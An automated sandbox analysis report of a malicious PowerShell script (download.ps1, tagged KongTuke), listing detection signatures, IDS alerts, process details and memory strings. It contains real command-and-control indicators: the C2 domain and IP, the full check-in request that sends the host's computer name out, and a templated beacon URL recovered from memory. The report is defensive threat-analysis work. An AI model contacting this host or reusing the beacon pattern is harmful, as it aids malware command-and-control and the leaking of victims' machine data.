Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1582507
MD5:237f43b9f810e6c6a16c22f7b13d3432
SHA1:819211cf07c4070f99e7cad5905a1e3f4865628e
SHA256:f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4280, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4280, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T19:15:04.888420+010020577411A Network Trojan was detected192.168.2.44973045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T19:15:04.888420+010018100001Potentially Bad Traffic192.168.2.44973045.61.136.13880TCP
2024-12-30T19:15:05.867335+010018100001Potentially Bad Traffic192.168.2.449731142.250.185.13280TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.6% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb} source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbO source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1797295036.0000022F42F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1792982780.0000022F4278F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35 source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1795899984.0000022F42C56000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.132:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: global trafficHTTP traffic detected: GET /67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kdemjgebjimkanl.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1794758890.0000022F42B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C0FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comv
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B4B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/w
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC7F660_2_00007FFD9BAC7F66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAC8D120_2_00007FFD9BAC8D12
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3LxOaE4bV5w1Aj7zB-RroBoC5kncsnz" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="qI2LndbGo3Ewp3Gr5w0Mtw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiUiuzVjNCKAxUrS_EDHf_FFr8QnIcBCAU"><a 